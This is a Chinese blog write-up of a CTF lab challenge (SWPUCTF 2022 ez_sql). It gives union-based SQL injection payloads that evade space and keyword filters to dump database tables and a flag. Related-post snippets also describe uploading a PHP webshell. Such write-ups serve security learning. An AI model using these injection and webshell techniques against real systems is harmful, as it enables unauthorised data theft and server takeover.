[SWPUCTF 2022 新生赛]ez_sql

最新推荐文章于 2024-04-28 16:38:04 发布
最新推荐文章于 2024-04-28 16:38:04 发布
阅读量349 收藏
点赞数
文章标签: sql 数据库 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46056107/article/details/134612097
版权

参数为1的时候没有报错,为2和任何数的时候报,发现空格被过滤了,然后union需要双拼写

4'/**/ununionion/**/select/**/1,2,3;#

发现存在3个

数据库为NSS_db

它的表有两个为,NSS_tb和users

nss=2'/**/ununionion/**/select/**/1,database(),group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema='NSS_db';#

查表的字段发现flag

nss=2'/**/ununionion/**/select/**/1,database(),group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb';#

查字段的数据

nss=2'/**/ununionion/**/select/**/1,group_concat(Secr3t),group_concat(flll444g)/**/from/**/NSS_tb;#

m0_46056107
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
ez_setup.py
05-26
"ez_setup.py" 是一个在Python环境中用于安装setuptools的脚本文件。setuptools是Python的一个重要库,它提供了一套全面的工具集,用于管理、构建、打包和部署Python项目。这个脚本通常用于在没有其他包管理器(如...
SWPUCTF 2022新生 web部分wp
weixin_44770698的博客
01-16 3801
SWPUCTF 2022新生
[SWPUCTF-2022-新生]ez_sql
liaochonxiang的博客
04-24 545
根据提示,POST传参得到假的flag。
[UUCTF 2022 新生]ezsql
最新发布
liaochonxiang的博客
04-28 459
反向前后过滤了相同的字符串:or,from,wehere。
NSSCTF做题(10)
wwwwyyyrre的博客
10-19 472
叫10好听一点,就是补9的 第7页的内容。
【Web】SWPUCTF 2022 新生 个人复现
uuzeray的博客
11-28 685
挑了部分题,太简单的就没选进来(但选进来≠有难度)
NSSCTF-[SWPUCTF 2022]-web
J1ng_Hong的博客
11-14 648
ls发现根目录下有一个flag文件,然后用cat把他读取出来就行了。然后就得到了flag。
SWPU NSS新生校外通道(部分WP)
qq_63205508的博客
10-28 1057
NSSCTF、SWPU NSS新生校外通道、WP
ez_setup.py下载
05-16
ez_setup.py下载
打印机驱动 SW_EZ_V2.63p_b6
05-26
打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V...
EZ.RAR_EZ_ez-usb_编程器 51
09-19
标题“EZ.RAR_EZ_ez-usb_编程器 51”暗示了这是一个与51系列单片机编程相关的资源包,其中包含了EZ-USB编程器的相关软件和文档。EZ-USB是一种通用的USB接口解决方案,常用于开发USB设备,如编程器,它为51系列单片机...
2022 UUCTF Web
weixin_63231007的博客
12-19 2276
2022UUCTF web部分题分析
NSSCTF第11页(3)
wwwwyyyrre的博客
11-09 620
源码发现会在写入文件之前会删除目录下的除了index.php的文件。写入文件的文件名和文件内容也是可控的,只不过存在过滤stristr函数对文件内容进行过滤,该函数绕过还是简单的,只需要添加一些特殊字符就可以了,和字符串弱类型比较相似。对于文件名的正则匹配,有点没读懂怎么个条件,到底是允许字母还是不允许,测试了一下该代码环境,运行之后明白该正则条件输入.[a-z]是可以绕过该正则的,返回false知道了这些剩下的就是利用了既然会删除除了index.php文件,直接覆盖index.php。
2022UUCTF-web
bossDDYY的博客
11-03 1937
我们先输入手机号和验证码试试,发现无论请求多少次 hint永远是895547922,结合mt_srand和mt_rand函数 当设置的种子确定(此处的种子时输入的手机号)时,每次的mt_rand都是固定的 我们可以猜测hint就是mt_rand的第一次,而目的验证码就是mt_rand的第二次。而且我们笃定是有上传的网页的,限制了文件类型 我们想要上传的是so,但是LD_PRELOAD也能解析jpg后缀 所以修改后缀上传就可以。sub的值是当前时间的最后一位,也就是保证当前的时间为xxxxxxxx1即可。
【CTF】[UUCTF 2022 新生]ez_upload
西原一点红的博客
06-19 831
Apache解析漏洞主要是因为Apache默认一个文件可以有多个用.分割得后缀,当最右边的后缀无法识别(mime.types文件中的为合法后缀)则继续向左看,直到碰到合法后缀才进行解析(以最后一个合法后缀为准),可用来绕过黑名单过滤。webshell工具连接。flag 在/目录下。
2021美团杯CTF ez-sql
iO快到碗里来
09-11 1026
MySQL 正则表达式 MySQL LIKE 子句 Python chr() 函数 Python ord() 函数 string — 常见的字符串操作 正则;REGEXP BINARY 匹配区分大小写.REGEXP 不区分大小写的匹配 fuzz一下,ban了很多东西,不过同时也留了不少可用函数。看到 =、like 被ban之后就能想到 regexp,加上引号也被ban就能联想到 \ 转义引号实现注入的姿势。 尝试一波username=admin\&password=||1%23回显 flag is
[SWPUCTF 2021 新生]easy_sql
wyxlsm的博客
02-20 286
看库的表 使用函数 union_select 和 information_schema 的函数。我们可以简单看到 name:xxx password:yy 可能有数据库等你注入。这里 就看到提示你参数wllm 这边使用get 传参 让你输入点东西 可以。可以看出 使用函数 union_select 的命令 看出上限 在3。wllm =1' 可以看出字符串漏洞 去一步一步的开库。看到这个界面你直接打开F12或F11看源代码 看有什么提示。已经得出 查看flag值。
UUCTF2022-Writeup
Ivyyyyyy1的博客
10-31 1414
UUCTF2022 Writeup
2021年四川省大学生网络安全技能大EZSQL
woshilnp的博客
05-24 539
题目一 EZSQL 操作内容: 考点:MYSQL8新特性 fuzz之后发现,只能盲注,过滤了select,使用1' and (ascii(substr(database(),1,1)))>num --+可以盲注出数据库,但是后面就搞不动了 无select注入,使用的是table语句。 TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]] 这个作用是列出表的全部内容,于是就可以利用这个语句来进行注入。 首先需要知
php upload ctf,强网杯CTF防御ez_upload Writeup
05-14
首先,我们需要分析题目所提供的代码: ```php <?php error_reporting(0); if ($_FILES["upload"]["error"] > 0) { echo "Error: " . $_FILES["upload"]["error"] . "<br />"; } else { echo "Upload: " . $_FILES["upload"]["name"] . "<br />"; echo "Type: " . $_FILES["upload"]["type"] . "<br />"; echo "Size: " . ($_FILES["upload"]["size"] / 1024) . " Kb<br />"; move_uploaded_file($_FILES["upload"]["tmp_name"], "upload/" . $_FILES["upload"]["name"]); echo "Stored in: " . "upload/" . $_FILES["upload"]["name"]; } ?> ``` 从上述代码中我们可以发现,这是一个文件上传的代码,该代码运行后会将用户上传的文件存储到 `upload` 目录下。 但是,该代码没有对上传的文件类型进行限制,这意味着我们可以上传任何类型的文件,甚至是一些恶意的文件。我们可以尝试上传一些常见的恶意文件,比如 `webshell`。 我们可以在本地创建一个 `webshell.php` 文件,然后上传到服务器上的 `upload` 目录。上传完成后,我们可以访问 `http://xxx.xxx.xxx.xxx/upload/webshell.php` 来执行我们上传的 `webshell`。 最后,我们需要注意的是,该上传脚本没有做任何安全性检查,这意味着我们可以上传任意大小的文件,这可能会影响服务器的性能,甚至导致服务器崩溃。因此,在实际应用中,我们应该对上传的文件大小进行限制,同时对上传的文件类型进行检查,从而确保服务器的安全性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

m0_46056107

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值